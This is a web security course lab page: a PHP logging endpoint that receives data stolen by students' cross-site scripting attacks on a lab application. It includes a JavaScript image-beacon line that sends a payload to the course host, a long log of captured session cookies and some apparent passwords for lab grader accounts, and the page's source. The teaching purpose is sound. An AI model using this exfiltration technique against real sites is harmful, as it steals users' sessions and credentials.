You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2020/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Fri, 02 Jan 2026 15:02:26 +0000: MHIT: PyZoobarLogin=grader#cc8f51640d9d3557937cb211cd27f626 Fri, 02 Jan 2026 14:57:05 +0000: MHIT: PyZoobarLogin=grader#e36a7bfd4c9be24aa40f8e78f9609fe3 Fri, 02 Jan 2026 14:55:45 +0000: MHIT: PyZoobarLogin=grader#1e5299b750c151e870ee5308e9b19b2c Fri, 02 Jan 2026 14:52:41 +0000: MHIT: PyZoobarLogin=grader#8939a5c8b67d390963890005b8b6e2b2 Fri, 02 Jan 2026 14:41:52 +0000: MHIT: PyZoobarLogin=grader#6339a8dd3b5d4df4ba03b394866a6106 Fri, 02 Jan 2026 09:21:15 +0000: MHIT: PyZoobarLogin=1#189675c26d3b6ab1837b36a4e8f516de Fri, 02 Jan 2026 09:13:31 +0000: MHIT: PyZoobarLogin=grader#877710f49ddc95d01666cfb184f98b6e Fri, 02 Jan 2026 09:12:26 +0000: MHIT: PyZoobarLogin=1#d7b5826086a1790bb8f2c31ba918b643 Fri, 02 Jan 2026 08:07:47 +0000: MHIT: PyZoobarLogin=grader#52ba591dcf654a30b487f66fe24d3607 Fri, 02 Jan 2026 07:35:25 +0000: MHIT: PyZoobarLogin=grader#7cc87e84763baedd2c76e107fc170aef Fri, 02 Jan 2026 07:35:20 +0000: MHIT: PyZoobarLogin=grader#ea4b7d8d252e4c01c83a6590f605863b Fri, 02 Jan 2026 07:35:14 +0000: MHIT: PyZoobarLogin=grader3#8e9bf3aace8d33ce42bda7fc415f75ba Fri, 02 Jan 2026 07:35:09 +0000: MHIT: PyZoobarLogin=grader2#0da0fdbf719bb76194fefef478495c68 Fri, 02 Jan 2026 07:35:03 +0000: MHIT: PyZoobarLogin=grader1#2469ce1dfab9d2363952d37c65c7412f Fri, 02 Jan 2026 07:34:59 +0000: MHIT: PyZoobarLogin=grader#cd18c5da25fcf7a65793d5105a1b2ff5 Fri, 02 Jan 2026 07:33:37 +0000: MHIT: PyZoobarLogin=1#39656f1d19578d3638e6c24a7309e821 Fri, 02 Jan 2026 07:02:26 +0000: my-username: some-string Fri, 02 Jan 2026 06:08:44 +0000: kireii: grader/RCWDKQXCTOST Fri, 02 Jan 2026 06:08:31 +0000: kireii: PyZoobarLogin=grader#66afcd9783dba1a11371c738c2425318 Fri, 02 Jan 2026 06:08:25 +0000: kireii: PyZoobarLogin=grader#e82c349eb5074ab8b84f179503f707d7 Fri, 02 Jan 2026 06:08:16 +0000: kireii: PyZoobarLogin=grader#cc63df5dddfc9d34fd4b5faa3992d683 Wed, 31 Dec 2025 03:14:20 +0000: name: PyZoobarLogin=1#070e11f8ddc1523655caa6bdff95dc61 Wed, 31 Dec 2025 03:12:05 +0000: name: PyZoobarLogin=1#070e11f8ddc1523655caa6bdff95dc61 Wed, 31 Dec 2025 03:07:15 +0000: name: PyZoobarLogin=1#070e11f8ddc1523655caa6bdff95dc61 Wed, 31 Dec 2025 03:07:03 +0000: name: PyZoobarLogin=1#070e11f8ddc1523655caa6bdff95dc61 Wed, 31 Dec 2025 02:40:59 +0000: name: PyZoobarLogin=1#2d4e934e6e6ca7cdce7a1db9ac3dba8d Wed, 31 Dec 2025 02:29:01 +0000: NB: NB Wed, 31 Dec 2025 02:25:07 +0000: my-username: some-string Tue, 30 Dec 2025 11:21:55 +0000: hit-student: PyZoobarLogin=grader#64eaca4c2d4e128c6d8c6be9a0bcb5af Tue, 30 Dec 2025 11:19:29 +0000: grader: Phishing page loaded Tue, 30 Dec 2025 11:19:20 +0000: hit-student: WUTWPZCECQZC Tue, 30 Dec 2025 11:19:04 +0000: hit-student: PyZoobarLogin=grader#c313b6e57aabb132ee3ebcf8b23d53b8 Tue, 30 Dec 2025 11:18:55 +0000: hit-student: PyZoobarLogin=grader#de1cafee9be78e3f7b8dfe6b3bc0b7f8 Tue, 30 Dec 2025 11:15:05 +0000: hit-student: PyZoobarLogin=grader#f6d90cf8a9e10157286de3bd5b732a26 Tue, 30 Dec 2025 11:14:53 +0000: hit-student: PyZoobarLogin=grader#05d8de3b40ca64fc840190e50ebd77f8 Tue, 30 Dec 2025 11:13:52 +0000: hit-student: IXDUINTPHLMO Tue, 30 Dec 2025 11:13:35 +0000: hit-student: PyZoobarLogin=grader#263efe14e7bb7f2994f53c38aa7b29e2 Tue, 30 Dec 2025 11:13:27 +0000: hit-student: PyZoobarLogin=grader#bf0434a29d3e2cd3efe989e54af9a7dc Tue, 30 Dec 2025 11:10:50 +0000: hit-student: PyZoobarLogin=grader#7b9e8afd178e3e9ff8d632430e277b69 Tue, 30 Dec 2025 11:10:42 +0000: hit-student: PyZoobarLogin=grader#da85a9cb5011c8ddf7febadd067a48ef Tue, 30 Dec 2025 11:08:30 +0000: hit-student: PyZoobarLogin=grader#05dde895db13cbae99f4e70a851ec250 Tue, 30 Dec 2025 11:08:21 +0000: hit-student: PyZoobarLogin=grader#7078304de5dfaaeb912daed62bee065a Tue, 30 Dec 2025 11:04:38 +0000: hit-student: YYGZFGSQDLUF Tue, 30 Dec 2025 11:04:21 +0000: hit-student: PyZoobarLogin=grader#580ce8dd861eb75856abe523d1c8b585 Tue, 30 Dec 2025 11:04:12 +0000: hit-student: PyZoobarLogin=grader#8b88d1528bfee15909b93de66573710d Tue, 30 Dec 2025 11:01:57 +0000: hit-student: VHPQXWCOETII Tue, 30 Dec 2025 11:01:41 +0000: hit-student: PyZoobarLogin=grader#65eba6985e3596f8bc8e20f4f3db6342 Tue, 30 Dec 2025 11:01:32 +0000: hit-student: PyZoobarLogin=grader#9b7543866e2ddddcd7dc0ee9722fc882 Tue, 30 Dec 2025 10:59:18 +0000: grader: grader Tue, 30 Dec 2025 10:59:13 +0000: hit-student: CGAYGLCNFLDK Tue, 30 Dec 2025 10:58:56 +0000: hit-student: PyZoobarLogin=grader#1cff84bd3508bd2c2db05b130fd9c231 Tue, 30 Dec 2025 10:58:47 +0000: hit-student: PyZoobarLogin=grader#4816148f9ccd5805a5fed1f33a68449e Tue, 30 Dec 2025 10:56:34 +0000: hit-student: JDRGFUTJXWRR Tue, 30 Dec 2025 10:56:18 +0000: hit-student: PyZoobarLogin=grader#3a4433041ad525b9ee091edc0a249ed6 Tue, 30 Dec 2025 10:56:10 +0000: hit-student: PyZoobarLogin=grader#01a3825dfb269379175680b184651ce0 Tue, 30 Dec 2025 10:53:50 +0000: grader: grader Tue, 30 Dec 2025 10:53:45 +0000: hit-student: BSMWOMAJYBSF Tue, 30 Dec 2025 10:53:28 +0000: hit-student: PyZoobarLogin=grader#2412ff8c084d2c540c6c05e9e097f163 Tue, 30 Dec 2025 10:53:19 +0000: hit-student: PyZoobarLogin=grader#e063cff23f9e46b216731667e39298d8 Tue, 30 Dec 2025 10:50:47 +0000: grader: grader/RUZVJWSJXAIS Tue, 30 Dec 2025 10:50:42 +0000: hit-student: VFDQNBORJKSO Tue, 30 Dec 2025 10:50:25 +0000: hit-student: PyZoobarLogin=grader#85c3aab442c2389adbec0dd078e01e7b Tue, 30 Dec 2025 10:50:16 +0000: hit-student: PyZoobarLogin=grader#64b69b7bec979933b08e0750a135c37e Tue, 30 Dec 2025 10:44:39 +0000: hit-student: PyZoobarLogin=grader#6896e4bcad21d966a09048a7a813c64e Tue, 30 Dec 2025 10:44:30 +0000: hit-student: PyZoobarLogin=grader#7ee1ceaecd104cc1bdb3ceb75b2e4695 Tue, 30 Dec 2025 10:42:39 +0000: hit-student: VQKYDNFAMXKY Tue, 30 Dec 2025 10:42:23 +0000: hit-student: PyZoobarLogin=grader#ec3613721fa0367c91d5682f8825848d Tue, 30 Dec 2025 10:42:13 +0000: hit-student: PyZoobarLogin=grader#a88a29efb303154d2568f8078fb2a65d Tue, 30 Dec 2025 10:40:18 +0000: hit-student: ZEDDSJEIWLSA Tue, 30 Dec 2025 10:40:01 +0000: hit-student: PyZoobarLogin=grader#1480ea5f2a6199766a4e2c62fe0092ca Tue, 30 Dec 2025 10:33:49 +0000: hit-student: VEXYPUKBZTHA Tue, 30 Dec 2025 10:33:44 +0000: hit-student: TLPCMWLFGLBN Tue, 30 Dec 2025 10:33:27 +0000: hit-student: PyZoobarLogin=grader#d05fc6e7f42fd77034826be5a325d61c Tue, 30 Dec 2025 10:32:04 +0000: hit-student: GKYTQUTCGZRJ Tue, 30 Dec 2025 10:31:47 +0000: hit-student: PyZoobarLogin=grader#734a5bb5113f17aec36d64cb54fa3d1e Tue, 30 Dec 2025 10:31:38 +0000: hit-student: PyZoobarLogin=grader#004c325ef722a4a8d9d721fd1144469a Tue, 30 Dec 2025 10:29:15 +0000: hit-student: ZIHSGQRBESYL Tue, 30 Dec 2025 10:28:54 +0000: hit-student: PyZoobarLogin=grader#cd3d563db6c6dd4b3eae490ff148b442 Tue, 30 Dec 2025 10:28:45 +0000: hit-student: PyZoobarLogin=grader#33adfa8f62413c96971fd2e2d549d3e8 Tue, 30 Dec 2025 10:25:28 +0000: hit-student: SYKSLUSJGDVU Tue, 30 Dec 2025 10:25:11 +0000: hit-student: PyZoobarLogin=grader#e17e82800b1875cbb03a9a38be203d40 Tue, 30 Dec 2025 10:25:02 +0000: hit-student: PyZoobarLogin=grader#e9101d7905decea1e7b2c81a487ba996 Tue, 30 Dec 2025 10:23:42 +0000: hit-student: PyZoobarLogin=grader#3676a17db3a86318aa8812e957cd57da Tue, 30 Dec 2025 10:23:33 +0000: hit-student: PyZoobarLogin=grader#67b77d198d90bb2333b74b1ba3b2e53c Tue, 30 Dec 2025 10:22:46 +0000: hit-student: QTVJAEQJGUJA Tue, 30 Dec 2025 10:22:29 +0000: hit-student: PyZoobarLogin=grader#2a1b49c2edf952cecf9546697be0cf9f Tue, 30 Dec 2025 10:22:19 +0000: hit-student: PyZoobarLogin=grader#c70ce88919e967a684f6d2a4baf07e8a Tue, 30 Dec 2025 10:18:17 +0000: hit-student: PyZoobarLogin=grader#b23f6150eb174c7434e739069461a1c5 Tue, 30 Dec 2025 10:18:08 +0000: hit-student: PyZoobarLogin=grader#4e0f7d6daa91f62c473917eb6cb7bb94 Tue, 30 Dec 2025 10:15:38 +0000: hit-student: PyZoobarLogin=grader#bf34d94c75a93559fc53fb7f3e36548b Tue, 30 Dec 2025 10:15:30 +0000: hit-student: PyZoobarLogin=grader#58e505aeeac2876fdb7b6499548cc407 Tue, 30 Dec 2025 10:11:44 +0000: hit-student: PyZoobarLogin=grader#bf02f37269eb9325e9ae637d6994492e Tue, 30 Dec 2025 10:11:36 +0000: hit-student: PyZoobarLogin=grader#33c35126437111c682825b71472a0c98 Tue, 30 Dec 2025 10:05:00 +0000: hit-student: PyZoobarLogin=grader#db97f68281fec45cb3f83970bdb3d333 Tue, 30 Dec 2025 10:04:51 +0000: hit-student: PyZoobarLogin=grader#a6bd37f707c666d2aabe24d0017171cd Tue, 30 Dec 2025 10:01:33 +0000: hit-student: PyZoobarLogin=grader#12e2a86a4d2ce3e6fb5a0e286a181a70 Tue, 30 Dec 2025 09:52:26 +0000: hit-student: PyZoobarLogin=grader#d67009fe710478f5e8d2be73ee62c151 Tue, 30 Dec 2025 09:48:45 +0000: hit-student: PyZoobarLogin=grader#d9701afee517ecc26d9e3171e1adc838 Tue, 30 Dec 2025 09:46:12 +0000: hit-student: PyZoobarLogin=grader#6b47f4d0803b4a038dce5a407700669b Tue, 30 Dec 2025 09:43:16 +0000: hit-student: PyZoobarLogin=grader#72a52befc85eb4accf156ab9a39bb752 Tue, 30 Dec 2025 09:40:13 +0000: hit-student: PyZoobarLogin=grader#1eb2606c7d493cc0f9f0fbef5a96afd4
In case you are curious, here is the source code of this page.
<?php do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.858-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.858/2020/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.858-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>